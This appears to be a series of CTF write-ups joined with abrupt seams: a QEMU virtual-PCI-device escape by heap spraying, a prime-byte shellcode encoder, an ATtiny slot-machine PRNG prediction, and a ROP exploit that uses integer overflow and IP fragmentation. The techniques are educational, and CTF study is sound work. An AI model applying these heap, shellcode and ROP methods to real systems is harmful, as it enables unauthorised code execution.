You're dropped into a Linux virtual machine with root privileges, and your objective is to escape from the VM to read the flag on the host filesystem. The task description mentions a custom PCI device.

This virtual device's implementation has a heap overflow vulnerability allowing out-of-bounds reads and writes, as well as a use-after-free vulnerability. Although this is more than enough to apply well-known heap exploitation techniques, given my inadequate pwn skills, I decided to resort to heap spraying instead.

Reverse engineering

You're given an archive containing a custom qemu-system-x86_64 binary along with some less interesting files such as the kernel, the initramfs image, bios-256k.bin, and so on.

Nothing is known about this virtual PCI device at this point: no drivers, no documentation. The only option is to reverse-engineer its implementation. Although the binary is rather large (because it's a patched QEMU), finding the device wasn't too hard.

The device itself is really simple. It allocates a so-called MMIO region in RAM. Unlike ordinary RAM, memory accesses in the MMIO range are intercepted by the device and can cause side effects. For example, if the device in question were a serial port, a read from a certain location (a so-called register) could pop the next value from the input queue, and a write could push the given value into the output queue. Some other register might contain a bitmask describing the current state of the device: output queue full, input queue non-empty, current speed, and so on. Both real hardware devices and devices emulated by hypervisors are usually interacted with in this way.

There are several bugs in there. First, you can access (both read and write) offsets from -32768 to 32767 relative to the allocated buffer, regardless of its actual size. Second, you can use buffers after they have been freed.

Additionally, the binary includes an unreferenced function that calls system("cat flag"). So if we take control of the program counter (RIP), we can simply jump there.

Exploitation

Although PCI devices are usually interacted with using kernel modules, Linux also provides a way to do so from userspace (provided you have root). The interface is described in Documentation/filesystems/sysfs-pci.txt.

In short, you need to open the file /sys/devices/pci0000:00/0000:00:04.0/resource0 (the numbers may obviously vary), mmap it into memory, and access the required offsets.
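A minimal sketch of that userspace access in Python (the path is hypothetical and the BAR size may differ; the actual exploit was written in C, but the idea is the same):

```python
import mmap
import os

def open_bar(path, size=4096):
    """Map a PCI BAR exposed via sysfs into our address space."""
    fd = os.open(path, os.O_RDWR | os.O_SYNC)
    return mmap.mmap(fd, size, mmap.MAP_SHARED,
                     mmap.PROT_READ | mmap.PROT_WRITE)

def reg_read(bar, off):
    """Read a 32-bit little-endian device register."""
    return int.from_bytes(bar[off:off + 4], "little")

def reg_write(bar, off, value):
    """Write a 32-bit little-endian device register."""
    bar[off:off + 4] = value.to_bytes(4, "little")

# Hypothetical usage; the BDF numbers vary from machine to machine:
# bar = open_bar("/sys/devices/pci0000:00/0000:00:04.0/resource0")
# reg_write(bar, 0x0, 0x1337)
```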

Since the initramfs contains very few binaries (basically, only busybox), the exploit has to be written in C, compiled on some other machine into a statically linked binary, and then transferred to the VM (uuencode/uudecode is my tool of choice for this kind of task).

Although the vulnerabilities present were enough to gain RCE using well-known heap exploitation techniques, I wasn't feeling confident enough to do so properly. I decided to play the dirty way.

The heap where the overflow occurs is actually the heap of QEMU itself. It has to contain some useful structures that can be overwritten, right?

Hoping that it would contain some function pointers, I scanned the heap for all values that looked like pointers into the .text section of the QEMU binary, and replaced all of them with the address of the aforementioned system("cat flag") gadget.

Unfortunately, these pointers were never called, and I got stuck for several hours.

My thought process was as follows. Assuming there are actually live pointers there (as opposed to remnants of already-freed memory), in order to increase the chances that they will be called, the guest operating system has to ask the hypervisor or its virtual devices to do something. The more intricate, the better. There were very few devices available, and poking them would require writing some "drivers" for them, which would be rather troublesome.

Suddenly, an idea popped into my mind. ACPI is a known clusterfuck of weird shit. Attempting to suspend the machine would surely do something interesting: suspend has to put all the devices into some sleep state, maybe even reset some of them, and so on.

And it actually did the trick. Attempting to suspend the guest operating system after running the heap-spraying exploit gives the flag (and then crashes the hypervisor :)).

The binary is pretty simple: it executes the supplied shellcode at a known address, but every byte of the shellcode must be a prime number.

Creating shellcode

Prime bytes definitely make the task challenging. Since we have RWX memory at a known address, a good approach is a two-stage shellcode: the first stage will be "prime" and will write a normal shellcode (the second stage) to a known address and then run it. That way, we only need to build a write-what-where primitive out of prime bytes.

Let's take a look at the x86_64 opcode table to see which instructions we can use. I used this table and an assembler to check my assumptions. After that, a table of usable prime-byte instructions was born.

First of all, we see useful operations like add eax, imm32; and eax, imm32; xor eax, imm32; etc. Using and, we can zero EAX in two ops: and eax, 0x02020202; and eax, 0x05050505. After that, there are several ways to get any number into EAX. I proceeded with the xor opcode, because it turns out that you can take 3 prime bytes, xor them together, and get any byte in the range [0-255].
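This claim is easy to check exhaustively; a quick verification that every byte value in [0-255] is expressible as the xor of three prime bytes (repetition allowed):

```python
def primes_below(n):
    """Simple sieve of Eratosthenes."""
    flags = [True] * n
    flags[0] = flags[1] = False
    for i in range(2, int(n ** 0.5) + 1):
        if flags[i]:
            flags[i * i::i] = [False] * len(flags[i * i::i])
    return [i for i, f in enumerate(flags) if f]

PRIMES = primes_below(256)

def xor_triple(target):
    """Three prime bytes whose xor is `target`, if such a triple exists."""
    ps = set(PRIMES)
    for a in PRIMES:
        for b in PRIMES:
            if (a ^ b ^ target) in ps:
                return a, b, a ^ b ^ target
    return None
```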

Okay, we can get any number into EAX, but which registers can we move that number to? We have no mov r, r opcode, but we do have xchg eax, ebp and xchg eax, edi.

Note: we also have the mov edi, imm32 opcode, but it limits us to prime-byte values of EDI.

Now we can set EAX, EBP, and EDI to arbitrary values. What if we already have something like mov r/m, r? We do have this opcode in our list: 89. After a bit of poking, it turns out that mov dword ptr [rdi], eax assembles to 89 07, which are both prime bytes. Looks like we have our desired write-what-where primitive.

The scheme is:

1. Set the address in EAX
2. Move EAX to EDI
3. Set the value in EAX
4. Move EAX to [RDI]

Note: we have a lot of "set number in EAX" operations, and each one takes 2 ANDs to zero EAX and then 3 XORs to build the number. To get rid of the ANDs, we can track the value of EAX through the process of building the shellcode: since we can XOR EAX with any number, we XOR it with N ^ EAX to get N into EAX.

From that point, we simply take some shellcode, for example shellcraft.sh() from pwntools, write it DWORD by DWORD into our memory after the first stage, and pass control to it. Since we do not have a NOP, we can use some other harmless one-byte instruction, like xchg edi, eax (97), to fill the rest of the memory. Victory!
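The whole scheme can be sketched as a small encoder (a simplified version without the EAX-tracking optimization; 25, 35, 97, and 89 07 encode and eax, imm32; xor eax, imm32; xchg eax, edi; and mov dword ptr [rdi], eax respectively, and all of those bytes are prime):

```python
PRIMES = {p for p in range(2, 256) if all(p % d for d in range(2, p))}

def xor_triple(byte):
    """Three prime bytes xoring to `byte` (one always exists)."""
    for a in PRIMES:
        for b in PRIMES:
            if (a ^ b ^ byte) in PRIMES:
                return a, b, a ^ b ^ byte
    raise ValueError(byte)

def set_eax(value):
    """Zero EAX with two ANDs, then reach `value` with three XORs."""
    triples = [xor_triple((value >> (8 * i)) & 0xFF) for i in range(4)]
    code = b"\x25\x02\x02\x02\x02"       # and eax, 0x02020202
    code += b"\x25\x05\x05\x05\x05"      # and eax, 0x05050505 -> EAX = 0
    for k in range(3):                   # three xor eax, imm32
        code += b"\x35" + bytes(t[k] for t in triples)
    return code

def write_dword(addr, value):
    """Write-what-where: *(uint32_t *)addr = value, in prime bytes only."""
    return (set_eax(addr) + b"\x97"          # xchg eax, edi
            + set_eax(value) + b"\x89\x07")  # mov dword ptr [rdi], eax
```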

How NOT to create the shellcode

Here I'll explain the more complicated solution I came up with during the CTF.

After finding a way to set arbitrary values in EAX, EDI, and EBP, I just started randomly searching for other useful instructions to proceed with, and that's how I found mov dword ptr [rdi], ebx. Somehow I didn't try changing EBX to EAX and proceeded with the EBX version instead. But it gives us a problem: we don't control the EBX register... or do we?

We have mov dword ptr [rdi], ebx, and since we have mov r/m, r and mov r, r/m instructions in general, we also have mov ebx, dword ptr [rdi]. We also have add r, r/m. These two instructions give us the following scheme: search for various numbers in the binary itself (since we know its base address), place one of them in EBX, then add other numbers until we get the needed one. For this purpose, I took the first 0xA70 bytes of the binary. There we can find numbers like these: ['0x0', '0x1', '0x2', '0x3', '0x4', '0x5', ..., '0xe28', '0x1b90', '0x441f', '0x8be8', '0xb807', '0xb81b', '0xc308', '0xc3f3', '0xfffc', '0x10001', '0x10102', '0x1be00', '0x20000', ..., '0xf66c35d', '0xf66f4ff', '0x1000be00', '0x10070190', '0x100e4100', '0x100e4200', '0x100e4218', '0x10615567', '0x14ff41ff', '0x19e8c789', '0x1f0fc35d', '0x2008f315', '0x2009ce05', '0x20297525', ..., '0xffffffb0', '0xffffffc0', '0xffffffd0', '0xffffffe0']. Some of these numbers are close to powers of 2, so we need only about log(N) additions to produce a number N.

The other problem is how to efficiently find an optimal set of numbers whose sum gives the needed one. I believe this problem relates to the subset sum problem and so is NP-complete. I used a greedy approach: take the maximum number that does not exceed our goal, then keep adding the largest possible numbers until we reach it. One step of the algorithm is to take a number from a priority queue, try adding each number from the binary, and store the sums that are less than the goal back in the priority queue. This algorithm seems to give a suboptimal result in constant time (constant because we have a fixed set of numbers and I perform a fixed number of steps, 1000). For example, for the number 0xCAFEBABE, we get the following set of numbers to sum up: (3351726080, 50087367, 3670080, 131074, 65794, 7056, 3624, 504, 3).
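A sketch of this greedy search (the candidate numbers and step limit below are illustrative; the real implementation drew its candidates from the binary's first 0xA70 bytes):

```python
import heapq

def greedy_sum(goal, numbers, max_steps=1000):
    """Greedily find terms from `numbers` that sum to `goal`.

    Keeps a max-heap of partial sums (stored negated, since heapq is a
    min-heap) and repeatedly extends the largest partial sum that does
    not exceed the goal.
    """
    numbers = sorted({n for n in numbers if 0 < n <= goal}, reverse=True)
    heap = [(0, [])]  # entries: (-partial_sum, terms)
    for _ in range(max_steps):
        if not heap:
            break
        neg, terms = heapq.heappop(heap)
        current = -neg
        for n in numbers:
            s = current + n
            if s == goal:
                return terms + [n]
            if s < goal:
                heapq.heappush(heap, (-s, terms + [n]))
    return None
```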

To recap, we use the following algorithm:

1. Set up the address of a zero in EDI
2. Move [RDI] to EBX
3. Set up the address of the addition term in EDI
4. Add [RDI] to EBX
5. Repeat steps 3 and 4 if necessary
6. Profit

The write-what-where primitive then looks like this:

1. Set up the value in EBX
2. Set up the address in EDI
3. Move EBX to [RDI]

Now we can use this primitive as described in the previous part, "Creating shellcode". The source code can be found here.

That's all!

"slot machine" was a hardware task in the reverse-engineering category on Google CTF Finals 2017, which took place in Zurich back in October 2017.

All teams got the same ATtiny-based slot machine game, which contained 2 stub flags. The objective was to reverse-engineer it by disassembling it (in the literal, real-life sense) and dumping the firmware, figure out how the flags could be obtained without access to the circuit, and then do that on the machine at the organizers' table, which contained the real flags.

The USBasp programmer means that we're probably going to deal with an AVR-family microcontroller. For instance, the popular Arduino Uno is based on an AVR microcontroller.

The programmer has the ability to download the firmware (unless it has been read-protected via so-called fuse bits), so that's probably exactly what we're going to do.

Let's inspect the game first.

The slot machine has an LCD screen, like those commonly used in various DIY Arduino projects, which can be found cheaply on AliExpress.

Out of 10 buttons, only 2 in the upper row appear functional, and according to the schematics, the lower row is not connected at all. Pressing the leftmost button cyclically changes the current bet from 1 to 5. Pressing the second button plays the game. At the start of the game, you have 100 credits.

The game works like a typical slot machine. At the center of the screen, there are three reels, which display random symbols each time the game is played: nothing, "bar", lemon, and "7". Having three matching symbols in a row gives you some credits based on your bet.

However, at that point, the conditions to get the flags were not yet known.

So, without much hesitation, I disassembled the slot machine. What was inside was a printed circuit board with an ATtiny88 microcontroller.

ATtiny is one of the less powerful microcontroller lines in the AVR family. Although all AVR microcontrollers share the same basic instruction set (there are some instruction-set extensions, though), they have different sets of integrated peripherals, like timers, IO ports, SPI interfaces, and so on.

The programmer uses a simple protocol called ISP (in-system programming) over the Serial Peripheral Interface to talk to the microcontroller.

In order to figure out how to connect the programmer to the MCU, we need to consult the datasheet.

Reverse-engineering

Processor selection

AVR processors are relatively well supported by the IDA disassembler. Although there's no Hex-Rays decompiler support, the disassembler works mostly fine, but there are still some annoying problems.

One of the major obstacles is the CPU selection dialog.

Although all processors in the AVR family have the same basic instruction set, as mentioned above, they have different sets of integrated peripherals and different amounts of available memory.

Selecting a device with a mismatching memory size will result in either a truncated code section or buggy data section references (or both).

The set of peripherals affects two things: IO registers and interrupt vectors.

The registers tend to occupy the same locations across the whole AVR family. That is, locations corresponding to a missing peripheral are described as "reserved" in the datasheet, and the remaining registers are "fragmented" rather than "compacted".

However, interrupt vector layouts differ significantly. There are no unused vector numbers (likely because they would waste precious flash memory otherwise). For example, compare the interrupt vectors of the ATtiny88 and the ATmega328p.

It wouldn't be much of a problem if IDA actually had definitions for all the AVR processors. Unfortunately, as you can see in the screenshot, that isn't the case. So the best option seems to be to select the closest matching processor (which one is the closest match is also not obvious) and fix incorrect things (like interrupt names) by hand, consulting the processor reference manual.

.data section

Another problem lies in how the .data section is initialized.

To understand the problem, let's first discuss C and compilers in general.

The .data section is where the initialized data of your program goes. In C, that would be all non-zero-initialized variables with static lifetime (i.e., global variables and static variables inside functions). There's also the .rodata section for things like string constants (AFAIK there's no memory protection on AVR, so there's no dedicated .rodata either).

How do these variables get from the executable file to the RAM?

On a typical desktop Linux, this is handled by the ELF loader with the aid of the MMU: the loader maps the corresponding regions of the ELF file with copy-on-write access rights. This operation is transparent, and the description of the .data region - where it lies in the binary and where it should be mapped - can be easily parsed from the ELF file.

Here comes a little caveat. There's usually no ELF loader in embedded devices. And no MMU, either. There's just a blob of code in flash storage, where the only thing you know for certain is the entry point address.

How is .data section handled in this case?

In avr-libc (a commonly used C library for AVR), there's a small piece of code that's executed right after reset, just before calling the user's main function.

What this code does is copy the initial values for the .data section from persistent flash memory to RAM. These initial values are simply appended to the end of the .text (code) section.

AVR cannot execute code from RAM at all: it's a Harvard architecture processor (purists will still find a couple of places where it deviates from a pure Harvard architecture, though).

Flash memory can be read using the special lpm instruction. Besides .data initialization, it's often used for string constants and various tables, because there's much more flash memory available than RAM on (probably) all AVR devices. There are even special versions of typical libc functions that operate on data located in program memory instead of RAM: pgmspace.h, snprintf_P. Unlike the program counter, the lpm instruction is byte-addressable.

Flash memory can also be programmed by the MCU itself using spm instructions. This is often used by bootloaders, like the one flashed on the Arduino Uno, which programs sketches received over the serial interface from the USB chip. It's completely irrelevant to our discussion here, but I think it's worth mentioning.

Since all registers are 8 bits in size but the memory address width is 16 bits, register pairs are used to access arbitrary memory addresses. They are X (r26-r27), Y (r28-r29), and Z (r30-r31).

Actual reverse-engineering

Of course, I'm unable to reproduce the exact sequence of actions I took to figure out the program flow. Neither would it be practical, due to the rather chaotic nature of the reverse-engineering process.

However, one of the first things I noticed was certainly the flag strings:

RAM:01A7 {FLAG_II}
RAM:01B1 {FLAG_I}

We can start from there.

Here comes another problem with IDA and AVR assembly. AVR is an 8-bit processor with (up to) 16-bit addresses. So when a constant address is passed to a function, it's stored in a register pair using two load instructions. IDA can't recognize this pattern, so cross-references for data don't work as-is.

I had to resort to searching for the individual bytes of the addresses using "Search -> immediate value...".

There were two fragments of code mentioning the addresses of the two flags.

The second part of the task is pretty much the reenactment of that story.

Although the initial state of the PRNG seems to be truly random, the PRNG itself is rather weak: it's just a linear congruential generator with 32 bits of state, driven by the equation state = state * 0x41C64E6D + 31337.

Even though I couldn't trace the exact code path that leads to the second flag, intuition once again suggested that in order to obtain it, a triple "7" must be rolled.

The rand() function is called 9 times per game, once for each symbol on the screen. Symbols are determined in column-major order: the left reel comes first (top to bottom), then the middle reel, and finally the right reel.

Each symbol is rolled with some fixed probability.

This leads to the following idea: play a couple of games, note which symbols are rolled, then brute-force the internal state of the generator. Although the brute force is probabilistic, the longer the observed sequence, the higher the chance that only one initial state matches it. In practice, playing 5 games is more than enough to reliably recover the state value.
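A sketch of the state recovery (the symbol mapping below is a stand-in, since I'm not reproducing the real probability table from the firmware, and the full 2**32 search is better done in C):

```python
def lcg_next(state):
    """One step of the slot machine's PRNG, truncated to 32 bits."""
    return (state * 0x41C64E6D + 31337) & 0xFFFFFFFF

def recover_state(observed, symbol_from_rand, candidates):
    """Return all candidate seeds whose symbol stream matches `observed`."""
    matches = []
    for seed in candidates:
        state = seed
        for want in observed:
            state = lcg_next(state)
            if symbol_from_rand(state) != want:
                break
        else:
            matches.append(seed)
    return matches
```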

With the current internal state known, it's now easy to find how much the state must be advanced in order to reach one where a triple "7" will be rolled immediately.

The brute-force program and most of the PRNG reverse-engineering work were done by my teammate vient.

This task is a remote x86_64 binary (both the binary and libc were provided), tagged "pwn" and "network". The goal is to exploit some vulnerability to gain remote code execution.

There are two parts to the task, named 2manypkts-v1 and 2manypkts-v2 respectively. We only managed to solve the first part, and submitted the flag literally at the last minute. So this write-up covers the first part only.

The binary has a simple stack buffer overflow vulnerability. You can overflow the buffer up to (and beyond) main's return address, and employ the well-known ROP technique.

Why was the task also tagged "network", you might ask? The problem is that the buffer is rather large, about 57 kilobytes. The data is read into the buffer with a single invocation of the read system call, without any looping. Since read tends to return data to user space as soon as it arrives, without waiting for the kernel buffer to fill up, getting it to overflow 57 kilobytes proved rather challenging.

Binary exploitation

The service employs a simple text-based protocol, which is common for exploitation CTF tasks.

It greets the user with the phrase "Welcome to the data eater".

Basically, all the service does is accept some data and print it back.

You can enter data of one of the following types: "double", "int", "char", "long", "unsigned long". The service accepts the data in binary format and prints it back in proper text format.

First of all, to check that the number is not too big, the following condition is evaluated: nelems < 14336, where nelems is a signed integer. Any negative number passes this check.

This sounds like an immediate win. Due to how negative numbers are represented in binary, and because read's count argument is an unsigned size_t, a negative nelems becomes a very large unsigned value.

The read system call doesn't check that the entire range from buf to buf + count is mapped before starting to read data. This means you can supply a count much larger than what is actually mapped in memory, and just give the program whatever amount of bytes you want. More than that, an attempt to write to unmapped memory doesn't even crash the program; it only causes read to return an EFAULT error code as soon as an unmapped page is encountered.

However, there's a small caveat. read has some sanity checks that cause an EFAULT error to be returned immediately if the address range is obviously invalid, namely if it overlaps with kernel space. As a side note, passing -1 when a binary is running on the 32-bit ABI on a 64-bit kernel actually works, as adding 2**32-1 is not enough to reach the kernel space, which is still 64-bit.

Okay, we can't just give the program some negative integer. Let's look further.

Secondly, the number is susceptible to integer overflow. Remember that in the read system call argument, nelems is actually multiplied by sizeof(T)? If nelems is exactly INT_MIN+1 and, say, we're dealing with 4-byte integers, nelems * 4 will overflow and become just 4. Likewise, INT_MIN+100000 becomes 400000 after multiplication.

Do you see where this is going? We can bypass the first check with a negative number, and use the integer overflow to ensure that the resulting number of bytes is not too big, yet large enough to cause a buffer overflow. Win!
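The bypass arithmetic can be modeled directly (the 32-bit mask mimics the wrapping int multiplication in the binary):

```python
INT_MIN = -2**31

def to_u32(x):
    """Interpret a value as it would appear in a 32-bit register."""
    return x & 0xFFFFFFFF

nelems = INT_MIN + 100000
assert nelems < 14336              # the signed size check passes
count = to_u32(nelems * 4)         # nelems * sizeof(int), truncated to 32 bits
assert count == 400000             # larger than the 57344-byte buffer
```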

The next steps are rather obvious. I decided to use two ROP chains. The first would leak the contents of some GOT entry, which would defeat libc ASLR, and then jump back to main. The second ROP chain would simply call system("/bin/sh"), whose address would be known at this point.

Networking part

But note that our payload has to be at least 14336*sizeof(int) = 57344 bytes long (plus a small ROP chain payload).

When running over the network, read tends to return much smaller chunks of data, not causing the desired overflow. This is well-known behaviour of the Linux network stack.

Although I didn't investigate how exactly the kernel behaves, quick experiments showed that the typical amounts of data received were up to 7 kilobytes, and also multiples of 1448, which is consistent with typical MTU values. So although the kernel does seem to buffer received data a bit, it's not enough for us.

The hint provided by the CTF organizers suggested messing with MTU and fragmentation.

IPv4 supports fragmentation: when an IP packet is larger than the MTU, it is broken into fragments, which are transmitted over the network and reassembled at the destination host.
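For intuition, here's roughly how a large payload splits into fragments (in the real IPv4 header the offset field is stored in 8-byte units; the sizes here are illustrative):

```python
def fragment(payload_len, mtu=1500, ip_header=20):
    """Split an IP payload into (offset, length, more_fragments) tuples.

    Every fragment's data length except the last must be a multiple
    of 8, since the fragment offset field counts 8-byte blocks.
    """
    max_data = (mtu - ip_header) // 8 * 8
    frags = []
    off = 0
    while off < payload_len:
        length = min(max_data, payload_len - off)
        more = off + length < payload_len     # MF bit
        frags.append((off, length, more))
        off += length
    return frags
```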

TCP implementations avoid IP fragmentation if possible. One reason it's undesirable is that the loss of a single IP fragment causes the entire packet to be lost. Instead, TCP handles data "fragmentation" itself.

Transmission Control Protocol accepts data from a data stream, divides it into chunks, and adds a TCP header creating a TCP segment. The TCP segment is then encapsulated into an Internet Protocol (IP) datagram, and exchanged with peers. (Wikipedia)

It also allows the operating system to return chunks of data to the user program as segments arrive, which is exactly what interferes with our exploitation.

But what if we instead force the TCP/IP stack to create enormous segments that will be fragmented at the lower layer? The network stack will then wait for all IP fragments to arrive before passing the data up to the TCP layer.

Although you might argue that this eliminates only one of the places where data might be split into several chunks, in practice it reliably ensures that all the data is returned at once.

Now the question is, how do we make our TCP/IP stack behave that way?

After some fruitless attempts at modifying the interface MTU (which didn't have much effect on segment size), we decided to find a userspace TCP/IP stack that we could easily modify.

It includes a tool named tun_tcp_connect, which can be thought of as some kind of modified netcat.

In order not to interfere with the OS's own network stack (which might send RST in reply to unexpected packets), this tool uses a TUN device: it opens the TUN device, crafts network packets, and sends them into it. The operating system sees packets appearing on the TUN interface, originating from a virtual remote host (which is actually the tun_tcp_connect program).

In our case, we need to set up the TUN device as connected to some local network and instruct tun_tcp_connect to assume the role of some host in that network. Then we create typical NAT and routing rules that cause these packets to be forwarded to the global internet.

Networking (revisited)

At the CTF, the exploit worked almost on the first try. The only problem I had was with the stateful connection-tracking rule.

However, when I revisited my solution to write this article, I encountered some major problems. During the game, I had used my Android phone's Wi-Fi-tethered LTE connection.

This time, I tried to run the exploit over my home broadband connection, and it just didn't work. I also tried running it from my university network; it didn't work either.

After some tcpdump investigation, I concluded that the large fragmented packets simply never reached the destination host. The connection was established just fine, and small segments passed back and forth, but large segments didn't. tun_tcp_connect kept retransmitting these segments with no success.

Although I couldn't draw a definite conclusion about why exactly the packets didn't make it, I did make some observations.

My home connection seems to be allergic to large IP packets; not even large ICMP echo packets got through. Which is actually strange, as I have a "white" (globally addressable) IPv4 address directly on the interface. Perhaps the traffic passes through some DPI filters, which may defensively drop suspicious traffic.

On the university network, however, big ping payloads worked fine. I have no explanation for why large TCP segments were dropped while ICMP packets were not.

Only when I connected to the internet through my phone, recreating the same environment I had used at the CTF (though with a different phone and a newer Android version), did the exploit work like a charm. In this scenario, LTE turned out to be better than both home broadband and the university internet connection, which is really ironic.

By pure chance, we had decided to relocate from the university (which closes for the night) to a nearby 24h diner instead of going home. Had we done otherwise, we might have failed to solve this task.